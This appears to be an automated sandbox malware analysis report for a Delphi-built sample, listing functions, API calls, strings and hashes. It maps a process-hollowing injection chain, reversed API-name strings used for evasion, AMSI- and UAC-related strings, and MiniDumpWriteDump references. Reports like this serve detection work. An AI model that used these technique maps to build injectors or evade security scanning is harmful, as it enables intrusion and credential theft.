                                                                                                                                        • Part of subcall function 02DC79B4: NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02DC7A27
                                                                                                                                        • Part of subcall function 02DC7D00: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02DC7D74
                                                                                                                                      • SetThreadContext.KERNEL32(02E113D0,02E11420,ScanBuffer,02E113A4,02DCA77C,ScanString,02E113A4,02DCA77C,Initialize,02E113A4,02DCA77C,02E113CC,02E114BC,02E114F8,00000004,02E114FC), ref: 02DCA157
                                                                                                                                      • NtResumeThread.NTDLL(02E113D0,00000000), ref: 02DCA164
                                                                                                                                        • Part of subcall function 02DC87A0: LoadLibraryW.KERNEL32(?,?), ref: 02DC87B4
                                                                                                                                        • Part of subcall function 02DC87A0: GetProcAddress.KERNEL32(02E11390,BCryptVerifySignature), ref: 02DC87CE
                                                                                                                                        • Part of subcall function 02DC87A0: FreeLibrary.KERNEL32(02E11390,02E11390,BCryptVerifySignature,bcrypt,?,02E113D0,00000000,02E113A4,02DCA3C7,ScanString,02E113A4,02DCA77C,ScanBuffer,02E113A4,02DCA77C,Initialize), ref: 02DC880A
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000019.00000002.2789426246.0000000002DB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DB1000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_25_2_2db1000_Oupzhkpr.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: LibraryMemoryThreadVirtual$ContextFree$AddressAllocateCreateLoadProcProcessReadResumeSectionUnmapUserViewWrite
                                                                                                                                      • String ID: BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$I_QueryTagInformation$Initialize$MiniDumpReadDumpStream$MiniDumpWriteDump$NtOpenObjectAuditAlarm$NtOpenProcess$NtReadVirtualMemory$NtSetSecurityObject$OpenSession$SLGetLicenseInformation$ScanBuffer$ScanString$UacInitialize$UacScan$advapi32$bcrypt$dbgcore$ntdll$sppc
                                                                                                                                      • API String ID: 2388221946-51457883
                                                                                                                                      • Opcode ID: b54a6c55815c7c387bf83c0547634589a7cb6f6a6876f3ee5f77b03b4fd8fc8f
                                                                                                                                      • Instruction ID: c84339de6bcc52bb8c4f9509eab09d6d97ddcd71ed87c5ccc714d1fb6584f525
                                                                                                                                      • Opcode Fuzzy Hash: b54a6c55815c7c387bf83c0547634589a7cb6f6a6876f3ee5f77b03b4fd8fc8f
                                                                                                                                      • Instruction Fuzzy Hash: FDE20C34A50159DBDF12EB64DCB0ADE73BAFF48710F2140BAE10AAB355DA709E458F60
                                                                                                                                      Function 02DC8BAE Relevance: 45.4, APIs: 3, Strings: 22, Instructions: 1605threadCOMMON
                                                                                                                                      Download Yara Rule

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 7653 2dc8bae-2dc8bb3 7655 2dc8bb8-2dc8bbd 7653->7655 7655->7655 7656 2dc8bbf-2dc8ca6 call 2db493c call 2db480c call 2db494c call 2db46a4 call 2db4798 call 2db494c call 2db46a4 call 2dc8824 call 2db480c call 2db494c call 2db46a4 call 2db4798 call 2db494c call 2db46a4 call 2dc8824 7655->7656 7687 2dc8cac-2dc8d87 call 2db480c call 2db494c call 2db46a4 call 2db4798 call 2db494c call 2db46a4 call 2dc8824 call 2db480c call 2db494c call 2db46a4 call 2db4798 call 2db494c call 2db46a4 call 2dc8824 7656->7687 7688 2dca6f7-2dca761 call 2db44d0 * 2 call 2db4c0c call 2db44d0 call 2db44ac call 2db44d0 * 2 7656->7688 7687->7688 7731 2dc8d8d-2dc90b5 call 2db480c call 2db494c call 2db46a4 call 2db4798 call 2db494c call 2db46a4 call 2dc8824 call 2db480c call 2db494c call 2db46a4 call 2db4798 call 2db494c call 2db46a4 call 2dc8824 call 2db30d4 * 2 call 2db480c call 2db494c call 2db46a4 call 2db4798 call 2db494c call 2db46a4 call 2dc8824 call 2db480c call 2db494c call 2db46a4 call 2db4798 call 2db494c call 2db46a4 call 2dc8824 call 2db480c call 2db494c call 2db46a4 call 2db4798 call 2db494c call 2db46a4 call 2dc8824 call 2db480c call 2db494c call 2db46a4 call 2db4798 call 2db494c call 2db46a4 call 2dc8824 call 2db480c call 2db494c call 2db46a4 call 2db4798 call 2db494c call 2db46a4 call 2dc8824 call 2db4d8c call 2db4d9c call 2dc85dc 7687->7731 7840 2dc9128-2dc9449 call 2db480c call 2db494c call 2db46a4 call 2db4798 call 2db494c call 2db46a4 call 2dc8824 call 2db46a4 * 2 call 2dc8824 call 2db480c call 2db494c call 2db46a4 call 2db4798 call 2db494c call 2db46a4 call 2dc8824 call 2db480c call 2db494c call 2db46a4 call 2db4798 call 2db494c call 2db46a4 call 2dc8824 call 2db2ee0 call 2db2f08 call 2db480c call 2db494c call 2db46a4 call 2db4798 call 2db494c call 2db46a4 call 2dc8824 call 2db480c call 2db494c call 2db46a4 call 2db4798 call 2db494c call 2db46a4 call 2dc8824 call 2db480c call 2db494c call 2db46a4 call 2db4798 call 2db494c call 2db46a4 call 2dc8824 GetThreadContext 7731->7840 7841 2dc90b7-2dc9123 call 2db480c call 2db494c call 2db46a4 call 2db4798 call 2db494c call 2db46a4 call 2dc8824 7731->7841 7840->7688 7949 2dc944f-2dc96b2 call 2db480c call 2db494c call 2db46a4 call 2db4798 call 2db494c call 2db46a4 call 2dc8824 call 2db480c call 2db494c call 2db46a4 call 2db4798 call 2db494c call 2db46a4 call 2dc8824 call 2db480c call 2db494c call 2db46a4 call 2db4798 call 2db494c call 2db46a4 call 2dc8824 call 2db480c call 2db494c call 2db46a4 call 2db4798 call 2db494c call 2db46a4 call 2dc8824 call 2db480c call 2db494c call 2db46a4 call 2db4798 call 2db494c call 2db46a4 call 2dc8824 call 2dc8254 7840->7949 7841->7840 8022 2dc99bf-2dc9a2b call 2db480c call 2db494c call 2db46a4 call 2db4798 call 2db494c call 2db46a4 call 2dc8824 7949->8022 8023 2dc96b8-2dc9821 call 2db480c call 2db494c call 2db46a4 call 2db4798 call 2db494c call 2db46a4 call 2dc8824 call 2db480c call 2db494c call 2db46a4 call 2db4798 call 2db494c call 2db46a4 call 2dc8824 call 2db480c call 2db494c call 2db46a4 call 2db4798 call 2db494c call 2db46a4 call 2dc8824 call 2dc84c4 7949->8023 8050 2dc9a30-2dc9bb0 call 2db480c call 2db494c call 2db46a4 call 2db4798 call 2db494c call 2db46a4 call 2dc8824 call 2db480c call 2db494c call 2db46a4 call 2db4798 call 2db494c call 2db46a4 call 2dc8824 call 2db480c call 2db494c call 2db46a4 call 2db4798 call 2db494c call 2db46a4 call 2dc8824 call 2dc79b4 8022->8050 8113 2dc984b-2dc98b7 call 2db480c call 2db494c call 2db46a4 call 2db4798 call 2db494c call 2db46a4 call 2dc8824 8023->8113 8114 2dc9823-2dc9849 call 2dc79b4 8023->8114 8050->7688 8154 2dc9bb6-2dc9caf call 2db480c call 2db494c call 2db46a4 call 2db4798 call 2db494c call 2db46a4 call 2dc8824 call 2db480c call 2db494c call 2db46a4 call 2db4798 call 2db494c call 2db46a4 call 2dc8824 call 2dc8ac0 8050->8154 8123 2dc98bc-2dc99bd call 2db480c call 2db494c call 2db46a4 call 2db4798 call 2db494c call 2db46a4 call 2dc8824 call 2db480c call 2db494c call 2db46a4 call 2db4798 call 2db494c call 2db46a4 call 2dc8824 call 2dc79b4 8113->8123 8114->8123 8123->8050 8205 2dc9cb1-2dc9cfe call 2dc89b8 call 2dc89ac 8154->8205 8206 2dc9d03-2dca6f2 call 2db480c call 2db494c call 2db46a4 call 2db4798 call 2db494c call 2db46a4 call 2dc8824 call 2db480c call 2db494c call 2db46a4 call 2db4798 call 2db494c call 2db46a4 call 2dc8824 call 2db480c call 2db494c call 2db46a4 call 2db4798 call 2db494c call 2db46a4 call 2dc8824 call 2dc7d00 call 2db480c call 2db494c call 2db46a4 call 2db4798 call 2db494c call 2db46a4 call 2dc8824 call 2db480c call 2db494c call 2db46a4 call 2db4798 call 2db494c call 2db46a4 call 2dc8824 call 2db480c call 2db494c call 2db46a4 call 2db4798 call 2db494c call 2db46a4 call 2dc8824 call 2dc7d00 call 2db480c call 2db494c call 2db46a4 call 2db4798 call 2db494c call 2db46a4 call 2dc8824 call 2db480c call 2db494c call 2db46a4 call 2db4798 call 2db494c call 2db46a4 call 2dc8824 call 2db480c call 2db494c call 2db46a4 call 2db4798 call 2db494c call 2db46a4 call 2dc8824 SetThreadContext NtResumeThread call 2db480c call 2db494c call 2db46a4 call 2db4798 call 2db494c call 2db46a4 call 2dc8824 call 2db480c call 2db494c call 2db46a4 call 2db4798 call 2db494c call 2db46a4 call 2dc8824 call 2db480c call 2db494c call 2db46a4 call 2db4798 call 2db494c call 2db46a4 call 2dc8824 call 2db480c call 2db494c call 2db46a4 call 2db4798 call 2db494c call 2db46a4 call 2dc8824 call 2db2c2c call 2db480c call 2db494c call 2db46a4 call 2db4798 call 2db494c call 2db46a4 call 2dc8824 call 2dc87a0 * 3 call 2db480c call 2db494c call 2db46a4 call 2db4798 call 2db494c call 2db46a4 call 2dc8824 call 2dc87a0 * 2 call 2db480c call 2db494c call 2db4798 call 2db494c call 2dc87a0 call 2db480c call 2db494c call 2db4798 call 2db494c call 2dc87a0 * 5 call 2db480c call 2db494c call 2db4798 call 2db494c call 2dc87a0 call 2db480c call 2db494c call 2db4798 call 2db494c call 2dc87a0 call 2db480c call 2db494c call 2db4798 call 2db494c call 2dc87a0 call 2db480c call 2db494c call 2db4798 call 2db494c call 2dc87a0 call 2dc7ed4 call 2dc87a0 * 2 8154->8206 8205->8206 8206->7688
                                                                                                                                      APIs
                                                                                                                                        • Part of subcall function 02DC8824: FreeLibrary.KERNEL32(02E11384,00000000,02E11388,Function_000055D8,00000004,02E11398,02E11388,05F5E0FF,00000040,02E1139C,02E11384,00000000,00000000,00000000,00000000,02DC890B), ref: 02DC88EB
                                                                                                                                        • Part of subcall function 02DC85DC: CreateProcessAsUserW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,Kernel32,00000000,00000000,00000000), ref: 02DC8668
                                                                                                                                      • GetThreadContext.KERNEL32(02E113D0,02E11420,ScanString,02E113A4,02DCA77C,UacInitialize,02E113A4,02DCA77C,ScanBuffer,02E113A4,02DCA77C,ScanBuffer,02E113A4,02DCA77C,UacInitialize,02E113A4), ref: 02DC9442
                                                                                                                                        • Part of subcall function 02DC8254: NtReadVirtualMemory.NTDLL(?,?,?,?,?), ref: 02DC82C5
                                                                                                                                        • Part of subcall function 02DC84C4: NtUnmapViewOfSection.NTDLL(?,?), ref: 02DC8529
                                                                                                                                        • Part of subcall function 02DC79B4: NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02DC7A27
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000019.00000002.2789426246.0000000002DB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DB1000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_25_2_2db1000_Oupzhkpr.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: MemoryVirtual$AllocateContextCreateFreeLibraryProcessReadSectionThreadUnmapUserView
                                                                                                                                      • String ID: BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$I_QueryTagInformation$Initialize$MiniDumpReadDumpStream$MiniDumpWriteDump$NtOpenObjectAuditAlarm$NtOpenProcess$NtReadVirtualMemory$NtSetSecurityObject$OpenSession$SLGetLicenseInformation$ScanBuffer$ScanString$UacInitialize$UacScan$advapi32$bcrypt$dbgcore$ntdll$sppc
                                                                                                                                      • API String ID: 3386062106-51457883
                                                                                                                                      • Opcode ID: c63d820159f8334936f469f2abe3e5a17c27431360291d65f0f4b0f2a7b7817e
                                                                                                                                      • Instruction ID: 07415b1ba36ad6bf6bb0d18f5fa88b0f10656b5e96ffe92e63214fc9d0a68078
                                                                                                                                      • Opcode Fuzzy Hash: c63d820159f8334936f469f2abe3e5a17c27431360291d65f0f4b0f2a7b7817e
                                                                                                                                      • Instruction Fuzzy Hash: E7E20C34A50159DBDF12EB64DCB0ADE73BAFF48710F2140BAE10AAB355DA709E458F60
                                                                                                                                      Function 02DB5A78 Relevance: 35.2, APIs: 17, Strings: 3, Instructions: 184registrystringlibraryCOMMON
                                                                                                                                      Download Yara Rule

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 8509 2db5a78-2db5ab9 GetModuleFileNameA RegOpenKeyExA 8510 2db5afb-2db5b3e call 2db58b4 RegQueryValueExA 8509->8510 8511 2db5abb-2db5ad7 RegOpenKeyExA 8509->8511 8516 2db5b62-2db5b7c RegCloseKey 8510->8516 8517 2db5b40-2db5b5c RegQueryValueExA 8510->8517 8511->8510 8513 2db5ad9-2db5af5 RegOpenKeyExA 8511->8513 8513->8510 8514 2db5b84-2db5bb5 lstrcpyn GetThreadLocale GetLocaleInfoA 8513->8514 8518 2db5bbb-2db5bbf 8514->8518 8519 2db5c9e-2db5ca5 8514->8519 8517->8516 8520 2db5b5e 8517->8520 8521 2db5bcb-2db5be1 lstrlen 8518->8521 8522 2db5bc1-2db5bc5 8518->8522 8520->8516 8523 2db5be4-2db5be7 8521->8523 8522->8519 8522->8521 8524 2db5be9-2db5bf1 8523->8524 8525 2db5bf3-2db5bfb 8523->8525 8524->8525 8526 2db5be3 8524->8526 8525->8519 8527 2db5c01-2db5c06 8525->8527 8526->8523 8528 2db5c08-2db5c2e lstrcpyn LoadLibraryExA 8527->8528 8529 2db5c30-2db5c32 8527->8529 8528->8529 8529->8519 8530 2db5c34-2db5c38 8529->8530 8530->8519 8531 2db5c3a-2db5c6a lstrcpyn LoadLibraryExA 8530->8531 8531->8519 8532 2db5c6c-2db5c9c lstrcpyn LoadLibraryExA 8531->8532 8532->8519
                                                                                                                                      APIs
                                                                                                                                      • GetModuleFileNameA.KERNEL32(00000000,?,00000105), ref: 02DB5A94
                                                                                                                                      • RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 02DB5AB2
                                                                                                                                      • RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 02DB5AD0
                                                                                                                                      • RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 02DB5AEE
                                                                                                                                      • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,00000005,00000000,02DB5B7D,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 02DB5B37
                                                                                                                                      • RegQueryValueExA.ADVAPI32(?,02DB5CE4,00000000,00000000,00000000,00000005,?,?,00000000,00000000,00000000,00000005,00000000,02DB5B7D,?,80000001), ref: 02DB5B55
                                                                                                                                      • RegCloseKey.ADVAPI32(?,02DB5B84,00000000,00000000,00000005,00000000,02DB5B7D,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 02DB5B77
                                                                                                                                      • lstrcpyn.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 02DB5B94
                                                                                                                                      • GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105), ref: 02DB5BA1
                                                                                                                                      • GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105), ref: 02DB5BA7
                                                                                                                                      • lstrlen.KERNEL32(00000000), ref: 02DB5BD2
                                                                                                                                      • lstrcpyn.KERNEL32(00000000,00000000,00000105,00000000), ref: 02DB5C19
                                                                                                                                      • LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000000,00000000,00000105,00000000), ref: 02DB5C29
                                                                                                                                      • lstrcpyn.KERNEL32(00000000,00000000,00000105,00000000), ref: 02DB5C51
                                                                                                                                      • LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000000,00000000,00000105,00000000,00000000,00000002,00000000,00000000,00000105,00000000), ref: 02DB5C61
                                                                                                                                      • lstrcpyn.KERNEL32(00000000,00000000,00000105,00000000,00000000,00000002,00000000,00000000,00000105,00000000), ref: 02DB5C87
                                                                                                                                      • LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000000,00000000,00000105,00000000,00000000,00000002,00000000,00000000,00000105,00000000), ref: 02DB5C97
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000019.00000002.2789426246.0000000002DB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DB1000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_25_2_2db1000_Oupzhkpr.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: lstrcpyn$LibraryLoadOpen$LocaleQueryValue$CloseFileInfoModuleNameThreadlstrlen
                                                                                                                                      • String ID: .$Software\Borland\Delphi\Locales$Software\Borland\Locales
                                                                                                                                      • API String ID: 1759228003-3917250287
                                                                                                                                      • Opcode ID: 157c2bd4115408b97e0aa89cf95af42225febeb023ab7015406033b4d1de4b1f
                                                                                                                                      • Instruction ID: 6b455db6f387070558dbf4817e578a908255bf3db8132546e347ffad435e881a
                                                                                                                                      • Opcode Fuzzy Hash: 157c2bd4115408b97e0aa89cf95af42225febeb023ab7015406033b4d1de4b1f
                                                                                                                                      • Instruction Fuzzy Hash: DF514271E4020CBEFB26D6A4AC66FEE77AD9F04744F8041A1A606E6281D774DE44CFA4
                                                                                                                                      Function 02DC79B2 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52memorynativeCOMMON
                                                                                                                                      Download Yara Rule

                                                                                                                                      Control-flow Graph

                                                                                                                                      APIs
                                                                                                                                        • Part of subcall function 02DC8020: GetModuleHandleA.KERNELBASE(?), ref: 02DC8072
                                                                                                                                        • Part of subcall function 02DC80C8: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02DC811B
                                                                                                                                        • Part of subcall function 02DC80C8: GetProcAddress.KERNEL32(?,?), ref: 02DC812D
                                                                                                                                      • NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02DC7A27
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000019.00000002.2789426246.0000000002DB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DB1000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_25_2_2db1000_Oupzhkpr.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: AddressProc$AllocateHandleMemoryModuleVirtual
                                                                                                                                      • String ID: ntdll$yromeMlautriVetacollAwZ
                                                                                                                                      • API String ID: 1888340430-445027087
                                                                                                                                      • Opcode ID: b28aca1057c07091f90fd92693f3d4763abb5e56128c0a211b6375fa09902ec9
                                                                                                                                      • Instruction ID: 161482f123ef9bacaf355a129ed88de9153458b7628aeb5033515020d041f73f
                                                                                                                                      • Opcode Fuzzy Hash: b28aca1057c07091f90fd92693f3d4763abb5e56128c0a211b6375fa09902ec9
                                                                                                                                      • Instruction Fuzzy Hash: 8A110C75644209AFEB01EFA4DC51E9EB7EDEB4C710FA18868B505D7B40D670AE148F70
                                                                                                                                      Function 02DC79B4 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 51memorynativeCOMMON
                                                                                                                                      Download Yara Rule

                                                                                                                                      Control-flow Graph

                                                                                                                                      APIs
                                                                                                                                        • Part of subcall function 02DC8020: GetModuleHandleA.KERNELBASE(?), ref: 02DC8072
                                                                                                                                        • Part of subcall function 02DC80C8: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02DC811B
                                                                                                                                        • Part of subcall function 02DC80C8: GetProcAddress.KERNEL32(?,?), ref: 02DC812D
                                                                                                                                      • NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02DC7A27
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000019.00000002.2789426246.0000000002DB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DB1000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_25_2_2db1000_Oupzhkpr.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: AddressProc$AllocateHandleMemoryModuleVirtual
                                                                                                                                      • String ID: ntdll$yromeMlautriVetacollAwZ
                                                                                                                                      • API String ID: 1888340430-445027087
                                                                                                                                      • Opcode ID: 958b2cd2b49dc2b0246e0019ca691f39baabd24fa5d7b3484ed05b4371f510ae
                                                                                                                                      • Instruction ID: 475398cd9283b9194c40fc8be09373b9bceb1a73c670f40c78e1cf7c9be4eb34
                                                                                                                                      • Opcode Fuzzy Hash: 958b2cd2b49dc2b0246e0019ca691f39baabd24fa5d7b3484ed05b4371f510ae
                                                                                                                                      • Instruction Fuzzy Hash: EC111E75644209AFEB01EF94DC51E9EB7EDEB4C710FA18868B505D7B40D670AE148F70
                                                                                                                                      Function 02DC8254 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50nativeCOMMON
                                                                                                                                      Download Yara Rule

                                                                                                                                      Control-flow Graph

                                                                                                                                      APIs
                                                                                                                                        • Part of subcall function 02DC8020: GetModuleHandleA.KERNELBASE(?), ref: 02DC8072
                                                                                                                                        • Part of subcall function 02DC80C8: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02DC811B
                                                                                                                                        • Part of subcall function 02DC80C8: GetProcAddress.KERNEL32(?,?), ref: 02DC812D
                                                                                                                                      • NtReadVirtualMemory.NTDLL(?,?,?,?,?), ref: 02DC82C5
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000019.00000002.2789426246.0000000002DB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DB1000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_25_2_2db1000_Oupzhkpr.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: AddressProc$HandleMemoryModuleReadVirtual
                                                                                                                                      • String ID: ntdll$yromeMlautriVdaeRtN
                                                                                                                                      • API String ID: 36784810-737317276
                                                                                                                                      • Opcode ID: bc302a97aa87c0010077c86eafc62b567acc15d8241218e4261ae4a100dfcc91
                                                                                                                                      • Instruction ID: 74cc5bc89f83d7096e5bfdaeed5cc4e05512e85437c726b0793473b9050407f0
                                                                                                                                      • Opcode Fuzzy Hash: bc302a97aa87c0010077c86eafc62b567acc15d8241218e4261ae4a100dfcc91
                                                                                                                                      • Instruction Fuzzy Hash: D5018074640209AFEB02EFA4D861E9EB7EEEB4C710F618464F505D7B04D630AD109F34
                                                                                                                                      Function 02DC84C4 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 43nativeCOMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                        • Part of subcall function 02DC8020: GetModuleHandleA.KERNELBASE(?), ref: 02DC8072
                                                                                                                                        • Part of subcall function 02DC80C8: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02DC811B
                                                                                                                                        • Part of subcall function 02DC80C8: GetProcAddress.KERNEL32(?,?), ref: 02DC812D
                                                                                                                                      • NtUnmapViewOfSection.NTDLL(?,?), ref: 02DC8529
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000019.00000002.2789426246.0000000002DB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DB1000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_25_2_2db1000_Oupzhkpr.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: AddressProc$HandleModuleSectionUnmapView
                                                                                                                                      • String ID: noitceSfOweiVpamnUtN$ntdll
                                                                                                                                      • API String ID: 858119152-2520021413
                                                                                                                                      • Opcode ID: e03a8157d7cf6e2d44da2a6889a230446f24763af3f3aff353edd4a406b22e71
                                                                                                                                      • Instruction ID: 94c1fbc00f42b5d7a9c6c4cd7a96193159f40b353895935aa10079119d748620
                                                                                                                                      • Opcode Fuzzy Hash: e03a8157d7cf6e2d44da2a6889a230446f24763af3f3aff353edd4a406b22e71
                                                                                                                                      • Instruction Fuzzy Hash: CE017174650205AFEB02EFA4E861E9EB7AEEB49710FA24864F505D7B00CA70AD109A20
                                                                                                                                      Function 02DCDACC Relevance: 4.6, APIs: 3, Instructions: 80nativefileCOMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • RtlDosPathNameToNtPathName_U.NTDLL(00000000,?,00000000,00000000), ref: 02DCDB0B
                                                                                                                                      • NtWriteFile.NTDLL(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000), ref: 02DCDB72
                                                                                                                                      • NtClose.NTDLL(?), ref: 02DCDB7B
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000019.00000002.2789426246.0000000002DB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DB1000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_25_2_2db1000_Oupzhkpr.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Path$CloseFileNameName_Write
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 1792072161-0
                                                                                                                                      • Opcode ID: 022564346358c1b875911bf97068e008131d56f5c8cb2a1b2e05ee06248b85ed
                                                                                                                                      • Instruction ID: 1483ca765337ff610241d432da6c74234c024bdbaa294203d3a58523242d8d23
                                                                                                                                      • Opcode Fuzzy Hash: 022564346358c1b875911bf97068e008131d56f5c8cb2a1b2e05ee06248b85ed
                                                                                                                                      • Instruction Fuzzy Hash: A921F171A40309BAEB11EAD4CD56FDEB7BEEF04B00F614065B605F72C1D7B06E048A65
                                                                                                                                      Function 02DCD9F0 Relevance: 4.5, APIs: 3, Instructions: 47filenativeCOMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • RtlInitUnicodeString.NTDLL ref: 02DCDA6C
                                                                                                                                      • RtlDosPathNameToNtPathName_U.NTDLL(00000000,00000000,00000000,00000000), ref: 02DCDA82
                                                                                                                                      • NtDeleteFile.NTDLL(?), ref: 02DCDAA1
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000019.00000002.2789426246.0000000002DB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DB1000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_25_2_2db1000_Oupzhkpr.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Path$DeleteFileInitNameName_StringUnicode
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 1459852867-0
                                                                                                                                      • Opcode ID: 537c01e9aa588318e5261210d13c39076c4d128f16d3ee6753b8240ffc6698c8
                                                                                                                                      • Instruction ID: 57cc698666be975e0c56544d63f0ac194a4d62b18a572b121752bf496810ba2b
                                                                                                                                      • Opcode Fuzzy Hash: 537c01e9aa588318e5261210d13c39076c4d128f16d3ee6753b8240ffc6698c8
                                                                                                                                      • Instruction Fuzzy Hash: 59014F7590C249BEEB05E6A08D51BCD77BAEB54704F6100AA9201F7282DB74AF048B35
                                                                                                                                      Function 02DCDA44 Relevance: 4.5, APIs: 3, Instructions: 45filenativeCOMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • RtlInitUnicodeString.NTDLL ref: 02DCDA6C
                                                                                                                                      • RtlDosPathNameToNtPathName_U.NTDLL(00000000,00000000,00000000,00000000), ref: 02DCDA82
                                                                                                                                      • NtDeleteFile.NTDLL(?), ref: 02DCDAA1
                                                                                                                                        • Part of subcall function 02DB4C0C: SysFreeString.OLEAUT32(?), ref: 02DB4C1A
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000019.00000002.2789426246.0000000002DB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DB1000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_25_2_2db1000_Oupzhkpr.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: PathString$DeleteFileFreeInitNameName_Unicode
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 2256775434-0
                                                                                                                                      • Opcode ID: 359baa95bbab30d392699d89435aed60c85a33062d5f5c8eb069daadc38e9885
                                                                                                                                      • Instruction ID: fdad6b2058f45d4c3a1bdc10f0a4c848ccc12b7014e88afa18ad26d0443c0e85
                                                                                                                                      • Opcode Fuzzy Hash: 359baa95bbab30d392699d89435aed60c85a33062d5f5c8eb069daadc38e9885
                                                                                                                                      • Instruction Fuzzy Hash: 4301E175908209BADB11EAE0DD51FCEB7BEEB48700F604475A501F3281EB74AF048A74
                                                                                                                                      Function 02DCDBB0 Relevance: 3.1, APIs: 2, Instructions: 80nativeCOMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • RtlDosPathNameToNtPathName_U.NTDLL(00000000,?,00000000,00000000), ref: 02DCDBEB
                                                                                                                                      • NtClose.NTDLL(?), ref: 02DCDC65
